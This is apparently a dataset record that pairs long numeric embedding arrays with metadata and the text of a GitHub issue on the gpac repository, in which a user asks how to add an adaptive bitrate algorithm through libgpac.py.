0.005508866161108017, -0.015803534537553787, 0.011712831445038319, -0.02045351266860962, -0.0103306220844388, -0.009675470180809498, 0.016858167946338654, 0.008341197855770588, -0.0045940508134663105, -0.010810000821948051, -0.01403782144188881, 0.026973070576786995, 0.04014001786708832, 0.00953165628015995, -0.008956401608884335, 0.008572897873818874, 0.0045021697878837585, -0.01283937320113182, -0.028491104021668434, 0.007090817205607891, -0.0055847675539553165, 0.01363034825772047, -0.004777812864631414, 0.004330391995608807, -0.000426947110099718, 0.005496881436556578, 0.005980255547910929, -0.010146860033273697, 0.017960740253329277, 0.004729874897748232, -0.003892958629876375, -0.001592937158420682, 0.011712831445038319, -0.004657967947423458, 0.0005133352242410183, 0.010634228587150574, 0.003028078703209758, -0.0007710015634074807, -0.007957695052027702, -0.0004743856843560934, -0.017513319849967957, -0.011584997177124023, -0.016922086477279663, 0.021140621975064278, -0.013079063035547733, -0.021939588710665703, -0.014980600215494633, -0.01925506442785263, -0.004530133679509163, -0.009955108165740967, 0.002394898561760783, 0.004953585099428892, -0.03652869537472725, -0.015723638236522675, -0.0015380083350464702, 0.011672883294522762, -0.003139933804050088, 0.0071187810972332954, 0.003888963721692562, -0.0057565453462302685, -0.013007155619561672, -0.0039229197427630424, -0.0005043468554504216, -0.003201853483915329, -0.011289380490779877, 0.010937835089862347, -0.0013931958237662911, 0.008748670108616352, -0.007845839485526085, -0.0002813856117427349, 0.026765339076519012, -0.008972380310297012, 0.022786490619182587, 0.018184451386332512, -0.005800488404929638, 0.007921741344034672, 0.009252018295228481, 0.021444229409098625, -0.008253311738371849, -0.0003662756644189358, 0.01287133153527975, 0.011545049026608467, 0.013638338074088097, -0.009403822012245655, -0.006755251903086901, -0.022211236879229546, 0.011425204575061798, 0.016354819759726524, -0.010490414686501026, -0.022083401679992676, -0.00812947191298008, 0.0029541742987930775, 0.02083701640367508, 0.005305130034685135, 0.014317458495497704, 0.024096794426441193, 0.016922086477279663, -0.004729874897748232, -0.02205144427716732, 0.004570081830024719, -0.010905876755714417, -0.010738094337284565, 0.009140163660049438, -0.00835717748850584, -0.03181479871273041, -0.005440954118967056, 0.001687814248725772, -0.00029237137641757727, -0.011153556406497955, -0.0018715762998908758, 0.003735163016244769, -0.022962264716625214, 0.009204080328345299, 0.011137576773762703, 0.008121483027935028, -0.003201853483915329, -0.013270813971757889, 0.021108664572238922, 0.006335794925689697, 0.004060741513967514, 0.015995286405086517, -0.013614369556307793, 0.004246500786393881, -0.006108089815825224, -0.017433423548936844, -0.010746084153652191, -0.011041700839996338, -0.02604627050459385, 0.00592432776466012, -0.03486684709787369, -0.005468917544931173, 0.0031339414417743683, 0.015180341899394989, 0.009044287726283073, 0.02572668343782425, -0.009236039593815804, -0.005361057352274656, -0.014221583493053913, 0.021076705306768417, 0.005640695337206125, 0.005365052260458469, -0.010977784171700478, 0.0052771661430597305, 0.01181669719517231, -0.006487598642706871, -0.012567725032567978, 0.0610089935362339, 0.01448524184525013, -0.003751142183318734, 0.026317918673157692, 0.00611607963219285, 0.023154014721512794, -0.01417364552617073, -0.02542307786643505, -0.008093519136309624, -0.0029721511527895927, -0.001251379493623972, 0.005992240272462368, 0.00044392512063495815, -0.013973903842270374, 0.004102686885744333, 0.012807413935661316, -0.002141227014362812, 0.0023130045738071203, -0.025774622336030006, -0.012383962981402874, 0.0064396606758236885, -0.00737045519053936, 0.025758642703294754, -0.005760540254414082, -0.007725995033979416, 0.01569966971874237, -0.00997108779847622, -0.003996823914349079, 0.011984480544924736, -0.010282684117555618, 0.0158834308385849, -0.012655611149966717, 0.0034135794267058372, 0.018344243988394737, 0.0028243425767868757, 0.013055093586444855, 0.012112314812839031, 0.02465607039630413, -0.01639476791024208, -0.018056616187095642, -0.014573127962648869, 0.013350711204111576, -0.005484897177666426, 0.013079063035547733, 0.0032817500177770853, 0.0020573358051478863, 0.008900473825633526, 0.004246500786393881, 0.00403277762234211, -0.016922086477279663, 0.008269291371107101, 0.004494179971516132, -0.00018838104733731598, 0.017513319849967957, 0.003227819921448827, -0.00338361831381917, 0.002564678667113185, -0.02051742933690548, -0.010730104520916939, -0.010762062855064869, 0.0015509914373978972, -0.010969794355332851, -0.01147314254194498, 0.013766172342002392, -0.024368442595005035, 0.0003932407416868955, 0.009771346114575863, 0.02789986878633499, -0.02484782226383686, 0.0020513434428721666, -0.01353447325527668, -0.0006821166607551277, -0.012296076864004135, 0.004977554082870483, -0.013142979703843594, -0.015555854886770248, 0.002818350214511156, 0.004705905914306641, -0.005804483313113451, 0.006012214347720146, -0.005684638395905495, -0.006515562534332275, -0.006831153761595488, -0.013798131607472897, -0.017625175416469574, -0.013590400107204914, -0.0235055610537529, 0.001986427465453744, -0.019542692229151726, 0.027995744720101357, 0.02331380918622017, 0.0064236815087497234, -0.030360683798789978, -0.00006778721581213176, -0.005305130034685135, -0.0196865051984787, 0.0002716482267715037, 0.007550222333520651, -0.005904353689402342, 0.01791280321776867, 0.007957695052027702, 0.02230711281299591, -0.024624111130833626, 0.008269291371107101, 0.007178703788667917, -0.005141342058777809, -0.018567955121397972, 0.011201494373381138, -0.018312284722924232, -0.001911524566821754, 0.010570310987532139, 0.01112159714102745, -0.021236497908830643, -0.002752435626462102, 0.012056387029588223, 0.005365052260458469, 0.00562471617013216, 0.007534243166446686, 0.0069230347871780396, 0.01728961057960987, -0.005720591638237238, -0.00997907668352127, 0.030216868966817856, 0.014125707559287548, 0.007897772826254368, -0.009803304448723793, -0.00027015016530640423, 0.00981129426509142, -0.00379708269611001, -0.0017237677238881588, -0.007342491298913956, -0.02077309973537922, 0.005488892085850239, 0.009124184027314186, 0.005596752278506756, 0.01220020093023777, -0.0007974673062562943, 0.02542307786643505, 0.021508146077394485, 0.005788503680378199, 0.004837735090404749, 0.03413179889321327, 0.00037276727380231023, 0.004442247096449137, -0.021572064608335495, 0.0142934899777174, -0.0158834308385849, 0.0046899267472326756, 0.010889897122979164, -0.01773703098297119, 0.020549388602375984, 0.0034435405395925045, 0.0005038474919274449, 0.01665043830871582, 0.0014401350636035204, 0.007650093175470829, 0.03659261390566826, 0.014453282579779625, -0.01594734750688076, 0.018440119922161102, 0.003323695855215192, 0.013015145435929298, -0.01594734750688076, 0.003689222503453493, 0.0024787900038063526, 0.011345308274030685, -0.005488892085850239, -0.0050734300166368484, 0.01496462058275938, -0.006643396802246571, -0.010234746150672436, -0.0014840781223028898, 0.018663831055164337, -0.0028463141061365604, 0.008628825657069683, -0.0008568903431296349, 0.015915390104055405, -0.009387842379510403, 0.019926195964217186, 0.010626238770782948, 0.002696508076041937, 0.0030200888868421316, -0.024480298161506653, 0.005868400447070599, 0.0413224883377552, -0.0008349187555722892, -0.020884953439235687, -0.01658651977777481, -0.004076720681041479, 0.013941945508122444, 0.00562471617013216, -0.022770512849092484, 0.006363758817315102, -0.002516740933060646, -0.009252018295228481, 0.03162304684519768, 0.011840666644275188, -0.010098922066390514, 0.028491104021668434, -0.021779794245958328, 0.00877263955771923, -0.025391118600964546, -0.0162030179053545, 0.012320045381784439 ]
32
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
i want add ABR (bolao ) to choose the high quality or low quality Is there a template?
How to use libgpac.py add ABR algorithm
https://api.github.com/repos/gpac/gpac/issues/1672/comments
1
2021-01-06T00:30:25
2021-01-06T16:24:51Z
https://github.com/gpac/gpac/issues/1672
779,785,405
1,672
false
This is a GitHub Issue repo:gpac owner:gpac Title : How to use libgpac.py add ABR algorithm Issue date: --- start body --- i want add ABR (bolao ) to choose the high quality or low quality Is there a template? --- end body ---
230
[ -0.011590274050831795, 0.021323177963495255, -0.0063764788210392, -0.007283225655555725, 0.003385676071047783, -0.0011151524959132075, -0.013286768458783627, 0.05870455503463745, -0.05057308077812195, 0.05118732899427414, -0.026324912905693054, 0.02774353139102459, 0.03229189291596413, 0.02379479631781578, -0.004255860578268766, 0.025271914899349213, -0.0093160942196846, -0.005597699899226427, 0.015458573587238789, -0.01349151786416769, 0.03445638343691826, -0.03337413817644119, -0.0026306631043553352, 0.025023290887475014, 0.013308705762028694, 0.019758308306336403, -0.005758574698120356, -0.0003258622018620372, -0.02069430612027645, 0.005930417682975531, 0.039516616612672806, 0.01749144122004509, -0.018734563142061234, 0.0010795042617246509, -0.006065698340535164, -0.03281839191913605, 0.04861333593726158, 0.06043029949069023, -0.030566148459911346, 0.010083903558552265, -0.010157028213143349, -0.01750606670975685, -0.000996324815787375, 0.011685336008667946, -0.026573536917567253, 0.012409270741045475, 0.037527624517679214, 0.057008057832717896, 0.014317827299237251, -0.025096416473388672, 0.030215149745345116, -0.03410538658499718, 0.019509684294462204, -0.01408382784575224, -0.018076440319418907, -0.02654428593814373, 0.015049074776470661, -0.01655544526875019, -0.001735798898153007, 0.003310723230242729, 0.012292271479964256, 0.02293192408978939, -0.017286691814661026, 0.03802487254142761, -0.03164839372038841, -0.02009468339383602, 0.01904168725013733, 0.054434068500995636, -0.016102071851491928, 0.037966374307870865, -0.009191782213747501, -0.01733056642115116, -0.00028587208362296224, 0.016862569376826286, -0.016570068895816803, 0.006266791373491287, 0.022434674203395844, 0.031092645600438118, -0.009257594123482704, 0.012080209329724312, -0.053468819707632065, -0.012255708687007427, -0.013776703737676144, 0.0021626646630465984, -0.016657819971442223, 0.015356198884546757, -0.020796680822968483, -0.04919833689928055, 0.006562946829944849, 0.03673787787556648, 0.021176928654313087, 0.025228040292859077, 0.048116087913513184, 0.00592676131054759, 0.02920602820813656, 0.02636878751218319, -0.008387409150600433, -0.0036470971535891294, -0.04627334699034691, -0.04592234641313553, -0.01636531949043274, 0.018134938552975655, -0.014646888710558414, -0.038814619183540344, 0.032876890152692795, 0.0019835089333355427, 0.015107574872672558, -0.01392295304685831, -0.015736447647213936, 0.07850673794746399, -0.001948774792253971, -0.007509912364184856, 0.011422086507081985, 0.012869956903159618, -0.02483316697180271, 0.006533696781843901, -0.028650280088186264, -0.03454413637518883, 0.004116923548281193, -0.009930341504514217, 0.010325215756893158, -0.022873423993587494, -0.039077870547771454, -0.008614095859229565, -0.03553863242268562, 0.02971789985895157, -0.018310438841581345, 0.025286540389060974, 0.01176577340811491, -0.01602894626557827, -0.026822160929441452, -0.007802411448210478, 0.0005301545024849474, -0.048730336129665375, 0.0264419112354517, -0.006793289911001921, -0.020723555237054825, 0.020460305735468864, 0.0018372595077380538, -0.02705615945160389, -0.025827663019299507, -0.03802487254142761, 0.035304632037878036, -0.020021557807922363, -0.019977683201432228, -0.004372860305011272, 0.04197360947728157, 0.006654352881014347, -0.043143607676029205, 0.038726869970560074, -0.004548359662294388, -0.038054123520851135, -0.0013226440642029047, -0.02636878751218319, 0.02723165974020958, 0.03410538658499718, -0.005689105950295925, 0.02748028375208378, 0.03860986977815628, 0.0463903434574604, 0.014654201455414295, 0.006164416670799255, 0.026515036821365356, 0.04478159919381142, 0.007882848381996155, -0.024072669446468353, 0.02041643112897873, 0.025959288701415062, -0.02742178365588188, 0.020899055525660515, 0.015941197052598, -0.008723783306777477, -0.008723783306777477, 0.03135589510202408, -0.03559713065624237, -0.0021644928492605686, 0.05387831851840019, -0.005147982854396105, -0.013601204380393028, -0.01586807146668434, -0.015283074229955673, 0.011063775978982449, 0.03980911523103714, 0.009213719516992569, 0.004190048668533564, 0.006617790553718805, 0.06154179573059082, -0.0015136824222281575, 0.03828812390565872, -0.026675911620259285, 0.04229535907506943, 0.017286691814661026, 0.022186050191521645, -0.03431013599038124, 0.037615373730659485, 0.002912193303927779, -0.03156064450740814, -0.06066429615020752, -0.02497941628098488, 0.010471465066075325, -0.023326797410845757, -0.04884733632206917, -0.01914406195282936, 0.015195324085652828, -0.03170689567923546, 0.018325064331293106, 0.0074843186885118484, 0.01162683591246605, 0.014595701359212399, -0.05446331948041916, -0.01939268596470356, -0.022069051861763, -0.0002575362450443208, 0.01791556552052498, -0.024335918948054314, 0.011348961852490902, -0.01090290118008852, -0.015283074229955673, -0.008328909985721111, -0.0026635692920535803, 0.0193195603787899, 0.01810568943619728, 0.01382789108902216, -0.027816656976938248, -0.02560828998684883, 0.007553787436336279, -0.006793289911001921, 0.001965227769687772, 0.003316207556053996, 0.013177081011235714, 0.009338031522929668, 0.04361160472035408, 0.013798641040921211, 0.0002808447752613574, 0.01210945937782526, 0.013842516578733921, 0.0052869198843836784, -0.03489513322710991, -0.0011608555214479566, 0.01733056642115116, -0.029513150453567505, 0.03989686816930771, -0.014639575965702534, -0.01357926707714796, 0.001903071766719222, 0.025549789890646935, 0.001183707034215331, 0.02730478346347809, -0.03524613380432129, -0.014705388806760311, 0.0003555691218934953, 0.017798565328121185, 0.023750919848680496, -0.00022005981008987874, -0.009791404940187931, -0.004672671668231487, 0.03828812390565872, 0.0024441948626190424, 0.014771200716495514, -0.03755687549710274, 0.02895740233361721, -0.022785674780607224, -0.03164839372038841, -0.01715506799519062, -0.03431013599038124, -0.055282317101955414, 0.008533659391105175, -0.018076440319418907, -0.0028610059525817633, -0.004639765713363886, -0.0038792681880295277, -0.003541066311299801, -0.04250010848045349, 0.04171036183834076, 0.011882772669196129, 0.00040287169395014644, 0.022551674395799637, -0.022303050383925438, 0.04536660015583038, -0.008087597787380219, -0.020123932510614395, 0.04656584560871124, 0.03749837353825569, 0.027611907571554184, 0.0054551069624722, -0.019363434985280037, -0.01150252390652895, -0.017257442697882652, -0.04603934660553932, -0.009374593384563923, 0.023473046720027924, 0.02647116221487522, -0.03401763737201691, -0.0021224459633231163, 0.006994382943958044, 0.015721822157502174, 0.01690644398331642, -0.003436863422393799, 0.016175195574760437, 0.008394721895456314, -0.0020676024723798037, -0.011743836104869843, -0.00232719536870718, -0.022624799981713295, -0.0363868772983551, -0.003098661545664072, -0.005824386607855558, 0.044606100767850876, 0.007802411448210478, 0.009791404940187931, 0.039955366402864456, -0.034427136182785034, -0.03120964579284191, 0.005531887989491224, -0.014880888164043427, 0.03665012866258621, 0.01077858917415142, -0.02661741152405739, -0.03679637610912323, -0.003076724009588361, -0.003605050500482321, 0.027787407860159874, -0.054434068500995636, 0.0034606291446834803, -0.004694609437137842, -0.01357195433229208, -0.031092645600438118, -0.024160418659448624, -0.005539200268685818, 0.018544437363743782, 0.015370823442935944, -0.03419313579797745, -0.005608668550848961, -0.006083979737013578, -0.001956087304279208, -0.05996229872107506, -0.03746912628412247, 0.003747643670067191, 0.02714390866458416, -0.018573688343167305, 0.010720089077949524, -0.0014634091639891267, 0.03893161937594414, -0.007338069379329681, 0.012029021978378296, -0.009133282117545605, 0.0022979455534368753, 0.03208714351058006, 0.016409195959568024, 0.02379479631781578, 0.000982613884843886, 0.0332571379840374, 0.055370066314935684, 0.013593891635537148, 0.005264982581138611, -0.017008818686008453, -0.0010785901686176658, -0.031414393335580826, -0.0018555406713858247, -0.0149101372808218, 0.0423831082880497, -0.04603934660553932, -0.012321521528065205, 0.042617108672857285, -0.017286691814661026, 0.042880356311798096, -0.014149639755487442, 0.0004458324983716011, 0.009491593576967716, -0.009125969372689724, -0.035801880061626434, 0.028752654790878296, -0.007663474418222904, 0.007381943985819817, -0.03390063717961311, 0.015736447647213936, -0.008219222538173199, -0.009879154153168201, -0.05121657997369766, 0.003765924833714962, -0.02973252534866333, 0.00033386022550985217, 0.030653897672891617, -0.03910711780190468, 0.029937274754047394, -0.004186392296105623, -0.01124658714979887, 0.0468875914812088, -0.009623217396438122, 0.0010575667256489396, -0.021059930324554443, -0.028723403811454773, -0.02119155414402485, -0.023473046720027924, -0.03410538658499718, 0.004431360401213169, -0.026866035535931587, -0.028898904100060463, 0.023809419944882393, -0.0012184412917122245, 0.03258439153432846, -0.06399878859519958, 0.020489556714892387, 0.037527624517679214, -0.016994193196296692, 0.014595701359212399, -0.00405111163854599, -0.018471313640475273, 0.04492785036563873, -0.0052101388573646545, 0.00014876318164169788, -0.006734789814800024, -0.03182389214634895, 0.013067393563687801, 0.003085864707827568, 0.02085518091917038, -0.04870108887553215, 0.050280582159757614, -0.022346924990415573, 0.03545088320970535, 0.007166225928813219, 0.010010778903961182, -0.037001125514507294, -0.008372784592211246, 0.029103653505444527, 0.007941348478198051, -0.004987108521163464, 0.0200654324144125, 0.00019012436678167433, -0.0232536718249321, 0.03673787787556648, 0.002943271305412054, 0.004328985698521137, 0.004307047929614782, 0.02946927584707737, 0.0227564238011837, -0.03480738401412964, -0.013279455713927746, 0.01939268596470356, -0.0255059152841568, -0.025666790083050728, -0.0001900101051433012, 0.029791025444865227, 0.003882924560457468, 0.0093160942196846, -0.040803615003824234, -0.02094293013215065, -0.011860835365951061, 0.033227890729904175, 0.003517300821840763, -0.0072356946766376495, 0.023122048005461693, 0.004211985971778631, -0.018719937652349472, -0.01671632006764412, 0.00684813316911459, -0.02661741152405739, 0.025125665590167046, 0.03901936858892441, -0.045805346220731735, -0.01877843774855137, -0.01766694150865078, 0.01627757027745247, 0.0016279398696497083, 0.055896561592817307, -0.0028774591628462076, -0.02490629255771637, -0.02816765569150448, -0.013871765695512295, 0.0018811343470588326, -0.019846059381961823, -0.011268524453043938, 0.05030983313918114, 0.030536897480487823, -0.01636531949043274, 0.02224455028772354, 0.01430320180952549, -0.03767387568950653, 0.014712700620293617, -0.01851518824696541, -0.019875308498740196, -0.05229882523417473, 0.017432941123843193, 0.00797791127115488, 0.00016041743219830096, -0.02179117687046528, -0.002005446469411254, 0.0028445529751479626, -0.03299389034509659, 0.021250054240226746, -0.012826082296669483, 0.022200675681233406, 0.03860986977815628, -0.014105765148997307, -0.004102298989892006, 0.008899282664060593, 0.023414546623826027, 0.0035191287752240896, 0.04369935393333435, -0.020197058096528053, -0.01494670007377863, 0.011356274597346783, -0.01214602217078209, -0.020401807501912117, 0.041154611855745316, 0.03182389214634895, -0.04481085017323494, 0.02224455028772354, -0.01774006523191929, 0.005078514106571674, -0.02085518091917038, 0.012423896230757236, -0.035714130848646164, -0.01757919043302536, 0.009411156177520752, -0.042529359459877014, -0.006760383490473032, -0.0223176758736372, 0.041242361068725586, -0.021396303549408913, -0.0013153315521776676, -0.02707078494131565, -0.026909910142421722, 0.01964130997657776, 0.010595777072012424, 0.019085561856627464, 0.006584884133189917, 0.0041498299688100815, 0.023312171921133995, -0.0014113078359514475, -0.03050764836370945, -0.004069392569363117, -0.023399921134114265, 0.0350121334195137, 0.012614020146429539, 0.007678099442273378, 0.021264679729938507, 0.023414546623826027, -0.01689181849360466, -0.018061814829707146, -0.04369935393333435, 0.06300429254770279, -0.004135204944759607, 0.0010712776565924287, -0.03808337450027466, -0.007700036745518446, 0.011802335269749165, -0.02742178365588188, -0.019802182912826538, 0.016833318397402763, -0.014420202001929283, -0.029103653505444527, -0.015736447647213936, 0.027626533061265945, 0.015721822157502174, 0.01197783462703228, 0.013469579629600048, -0.0033015827648341656, -0.019802182912826538, 0.006965132895857096, 0.004226610995829105, 0.013813266530632973, 0.022478550672531128, -0.025184165686368942, -0.0015840650303289294, 0.006467884406447411, 0.00818997249007225, 0.018325064331293106, -0.012380020692944527, 0.01361582987010479, -0.000977129559032619, -0.005009045824408531, 0.041593361645936966, 0.03255514055490494, -0.007063851226121187, -0.011575648561120033, 0.02767040766775608, 0.0142227653414011, -0.035801880061626434, 0.021001430228352547, 0.013469579629600048, 0.009133282117545605, -0.034865882247686386, 0.023824045434594154, 0.01371089182794094, -0.0029231621883809566, -0.010595777072012424, -0.022610174492001534, -0.03164839372038841, -0.03328638896346092, -0.015619447454810143, 0.010939463041722775, 0.004449641332030296, -0.007228381931781769, -0.0005118732806295156, -0.027714282274246216, 0.007129663601517677, 0.013001581653952599, -0.017111193388700485, -0.01733056642115116, -0.019012436270713806, 0.003740331158041954, 0.012774894945323467, -0.005327138584107161, -0.01860293745994568, -0.029191402718424797, 0.038141872733831406, 0.005871918052434921, -0.027436409145593643, 0.011795023456215858, -0.023034298792481422, 0.03360813856124878, 0.06347228586673737, -0.026324912905693054, 0.0006814313237555325, 0.019275685772299767, -0.022888047620654106, 0.007604974787682295, -0.0013646907173097134, 0.039253368973731995, 0.020796680822968483, -0.02239079959690571, 0.020621180534362793, -0.03489513322710991, 0.027553407475352287, 0.019012436270713806, -0.004043798893690109, -0.036065127700567245, -0.009250281378626823, -0.005590387620031834, -0.035041384398937225, -0.0031004897318780422, 0.014105765148997307, -0.012913831509649754, -0.023414546623826027, -0.009191782213747501, -0.02258092537522316, 0.006409384775906801, -0.013023518957197666, 0.005122389178723097, -0.028050655499100685, -0.023838670924305916, -0.03217489272356033, 0.022771049290895462, -0.01722819171845913, 0.01601432077586651, -0.007729286793619394, -0.014771200716495514, 0.01948043517768383, -0.003067583544179797, -0.03790787234902382, -0.00957203097641468, -0.029542401432991028, 0.014815075322985649, 0.01835431344807148, -0.03732287511229515, 0.016657819971442223, 0.01714044250547886, -0.022127551957964897, -0.036065127700567245, -0.009323406033217907, -0.02388254553079605, -0.002769600134342909, -0.03428088501095772, 0.002665397245436907, 0.004771390464156866, 0.027538783848285675, -0.03059539757668972, 0.008482472039759159, 0.02680753543972969, 0.0010667074238881469, -0.03337413817644119, 0.022098300978541374, 0.007853598333895206, -0.008263097144663334, 0.0011526289163157344, 0.008599471300840378, -0.0003530554531607777, 0.0065702591091394424, -0.03635763004422188, -0.005586731247603893, 0.002107821172103286, -0.014720013365149498, -0.0313851460814476, -0.05706655979156494, 0.0008413917385041714, -0.030536897480487823, -0.025637539103627205, -0.004815265070647001, -0.0024149450473487377, 0.014354389160871506, 0.04127161204814911, 0.03419313579797745, 0.01974368467926979, -0.004519110079854727, 0.015473198145627975, 0.023224422708153725, -0.0030950051732361317, -0.0188808124512434, 0.013425705023109913, -0.02095755562186241, -0.006080323364585638, -0.0011279493337497115, -0.03954586759209633, -0.003427722956985235, 0.014018015936017036, 0.0008857236243784428, -0.021908177062869072, -0.03802487254142761, 0.018134938552975655, 0.011305087246000767, 0.012943081557750702, 0.0022211645264178514, -0.014354389160871506, -0.032204143702983856, -0.00015367624291684479, -0.008774970658123493, -0.006424009799957275, -0.04194435849785805, 0.02767040766775608, -0.01162683591246605, 0.016131320968270302, -0.017988689243793488, -0.03714737668633461, -0.015414698049426079, 0.02025555819272995, 0.021250054240226746, 0.015999697148799896, -0.003116942709311843, -0.004723859019577503, -0.038054123520851135, -0.017827816307544708, 0.009879154153168201, 0.014924762770533562, -0.0000072017887760011945, -0.01249702088534832, -0.019963057711720467, 0.030273647978901863, -0.009001657366752625, 0.003784205997362733, 0.011407461948692799, -0.0166285689920187, -0.008548283949494362, -0.024584542959928513, -0.0014798622578382492, -0.007787786424160004, -0.022010551765561104, 0.010888275690376759, -0.028898904100060463, -0.024584542959928513, 0.010793213732540607, 0.010332527570426464, 0.045015599578619, -0.023560795933008194, -0.0288842786103487, 0.008723783306777477, 0.023341422900557518, 0.018836937844753265, -0.009886466898024082, 0.02481854148209095, -0.02652966044843197, 0.03436863422393799, 0.006398416124284267, -0.00895778276026249, 0.0016599319642409682, -0.011809648014605045, -0.0013473236467689276, 0.026866035535931587, 0.01392295304685831, -0.014398264698684216, -0.018763812258839607, 0.023224422708153725, -0.02111842855811119, -0.008241159841418266, 0.014851638115942478, 0.00895778276026249, -0.015663322061300278, 0.03156064450740814, -0.006047417409718037, 0.01860293745994568, -0.022112926468253136, 0.014807762578129768, -0.0147858252748847, 0.02601778879761696, 0.019158685579895973, -0.03653312847018242, 0.02127930335700512, -0.003466113470494747, 0.020708931609988213, -0.006193666718900204, -0.00136377674061805, 0.017111193388700485, 0.02050418220460415, -0.028401654213666916, 0.031589895486831665, -0.008007160387933254, 0.02414579503238201, 0.028240781277418137, -0.02560828998684883, -0.0007193647907115519, 0.03445638343691826, 0.01793019101023674, -0.014039953239262104, -0.02369242161512375, -0.004888389725238085, 0.009389218874275684, -0.04010161757469177, 0.0012102146865800023, -0.027114659547805786, 0.030653897672891617, -0.022551674395799637, -0.006924914196133614, -0.00843859650194645, -0.02136705443263054, 0.012548208236694336, -0.011480586603283882, 0.012416583485901356, 0.0038024873938411474, -0.008650658652186394, 0.025739913806319237, -0.03144364431500435, 0.026149412617087364, 0.02524266578257084, 0.0193780604749918, 0.01370357908308506, -0.03390063717961311, -0.001105097820982337, 0.0427633561193943, 0.014317827299237251, 0.02163030207157135, 0.010668901726603508, 0.0188808124512434, -0.02187892608344555, 0.027685033157467842, -0.02731940895318985, 0.032701391726732254, -0.02145480364561081, -0.00965246744453907, -0.019070936366915703, 0.04861333593726158, -0.05305932089686394, 0.0026142101269215345, -0.027948280796408653, -0.03354963660240173, 0.014288577251136303, -0.03223339095711708, 0.032438140362501144, -0.021162305027246475, 0.010581152513623238, 0.020884430035948753, 0.019860683009028435, 0.020489556714892387, 0.005297888536006212, 0.028065280988812447, -0.014244702644646168, 0.02239079959690571, -0.00730150705203414, -0.02629566192626953, -0.0035063319373875856, -0.003612363012507558, 0.001959743443876505, 0.01042759045958519, -0.032350391149520874, -0.022127551957964897, -0.0001407651579938829, -0.02032868191599846, 0.028840404003858566, -0.04328985512256622, -0.013586579822003841, 0.006427666172385216, -0.024087294936180115, 0.003850018372759223, -0.000404928345233202, -0.009096719324588776, -0.006530040875077248, 0.0008468760643154383, -0.023853294551372528, -0.023897171020507812, 0.0015008855843916535, 0.0024771010503172874, -0.007224726025015116, 0.006083979737013578, -0.020913681015372276, 0.004628797061741352, 0.04548359662294388, -0.02353154681622982, -0.009557405486702919, 0.013886391185224056, -0.024672292172908783, -0.000438977062003687, 0.019334185868501663, -0.0013253862271085382, -0.0029213340021669865, -0.01249702088534832, 0.0053819818422198296, 0.02318054810166359, 0.015882696956396103, -0.016818692907691002, -0.007604974787682295, -0.0005306114908307791, -0.011129587888717651, -0.005374669563025236, 0.02024093270301819, 0.007246663328260183, 0.012826082296669483, 0.00036813743645325303, 0.02076742984354496, 0.0225662998855114, -0.0007285053725354373, -0.01163414865732193, -0.0012440348509699106, -0.013374517671763897, 0.010932151228189468, 0.007561099715530872, -0.005853636655956507, -0.0018646812532097101, -0.007487975060939789, -0.014895512722432613, 0.01983143389225006, 0.02388254553079605, 0.010354465804994106, 0.006343572400510311, 0.04396260157227516, 0.02603241242468357, -0.022463925182819366, -0.017783939838409424, -0.018559062853455544, -0.007926723919808865, 0.021133054047822952, -0.00004787386205862276, -0.027026910334825516, -0.012672520242631435, -0.015897322446107864, -0.007912098430097103, 0.004307047929614782, -0.028855029493570328, 0.01750606670975685, -0.004215642344206572, -0.03156064450740814, -0.03629912808537483, 0.02268330007791519, 0.00044811764382757246, 0.0112831499427557, -0.009959591552615166, 0.006796945817768574, -0.013316017575562, -0.020372556522488594, 0.02429204434156418, -0.028635654598474503, -0.01063965167850256, -0.0033290043938905, -0.012943081557750702, -0.02601778879761696, -0.022712549194693565, -0.0026580849662423134, 0.014288577251136303, -0.01551707275211811, -0.0020986804738640785, -0.007104069925844669, 0.007319787982851267, -0.012738332152366638, 0.009681717492640018, -0.011348961852490902, -0.01826656423509121, -0.010763963684439659, -0.015736447647213936, -0.025462040677666664, 0.04194435849785805, -0.0259446632117033, -0.03360813856124878, 0.018076440319418907, -0.027100034058094025, -0.023048922419548035, 0.020548056811094284, 0.0034222386311739683, 0.03284763917326927, -0.01029596570879221, 0.0028299279510974884, -0.029688650742173195, -0.016526194289326668, 0.0042668296955525875, -0.004420391283929348, 0.015751073136925697, -0.025111041963100433, 0.007462381385266781, 0.013681641779839993, 0.014858949929475784, 0.010186278261244297, -0.0018655953463166952, -0.005232076160609722, -0.018734563142061234, -0.012738332152366638, 0.014990574680268764, -0.03232114017009735, 0.030098149552941322, -0.01784243993461132, 0.00908940751105547, -0.0007394740823656321, -0.017813190817832947, -0.0200654324144125, -0.019846059381961823, -0.0029780056793242693, -0.021264679729938507, -0.0024332262109965086, 0.027611907571554184, 0.02818228118121624, 0.013542704284191132, 0.029410777613520622, -0.023911794647574425, 0.0373813733458519, -0.036591626703739166, -0.03126814588904381, -0.004365548025816679, -0.0024186011869460344, 0.0040328302420675755, 0.01335989311337471, -0.0017513378988951445, -0.013674329034984112, 0.024847792461514473, 0.013125893659889698, -0.003970674239099026, -0.030800146982073784, -0.0060327923856675625, 0.0020803993102163076, -0.010522652417421341, 0.012950394302606583, -0.03667937591671944, 0.01991918310523033, 0.03922411799430847, -0.0009917544666677713, 0.0007179937092587352, -0.0016608460573479533, 0.018383564427495003, 0.007495287340134382, -0.003915830515325069, -0.0019633995834738016, -0.009418468922376633, -0.0665142759680748, -0.021308554336428642, 0.01189008541405201, 0.02723165974020958, 0.006775008514523506, -0.05224032700061798, -0.010486089624464512, -0.0012632301077246666, 0.0005776855978183448, -0.0036873158533126116, 0.015634072944521904, -0.008263097144663334, 0.0073417252860963345, 0.00404745526611805, 0.002765943994745612, 0.061658792197704315, -0.0036818315275013447, 0.013462267816066742, -0.0131917055696249, -0.013871765695512295, 0.019275685772299767, 0.025447415187954903, 0.020123932510614395, -0.002584960078820586, -0.042090609669685364, 0.02024093270301819, -0.00612054206430912, -0.031589895486831665, -0.0027732562739402056, 0.011517149396240711, 0.029600901529192924, 0.004935921169817448, 0.031092645600438118, 0.003142536384984851, -0.005341763608157635, 0.00031420792220160365, -0.02198130078613758, 0.010983338579535484, -0.011444023810327053, 0.0072868820279836655, -0.020153183490037918, -0.0029213340021669865, -0.016423819586634636, -0.006533696781843901, -0.03466113284230232, 0.03024439886212349, -0.004961514845490456, -0.038229621946811676, -0.009228344075381756, 0.0065190717577934265, -0.009104032069444656, -0.00832159724086523, -0.015458573587238789, -0.02679290995001793, 0.01507832482457161, -0.032116394490003586, -0.0028865996282547712, -0.023399921134114265, -0.017345191910862923, 0.009155219420790672, 0.04995883256196976, 0.013030831702053547, -0.001741283223964274, 0.008679908700287342, -0.006753071211278439, -0.004903014749288559, 0.005897511728107929, 0.01879306137561798, 0.005462419241666794, 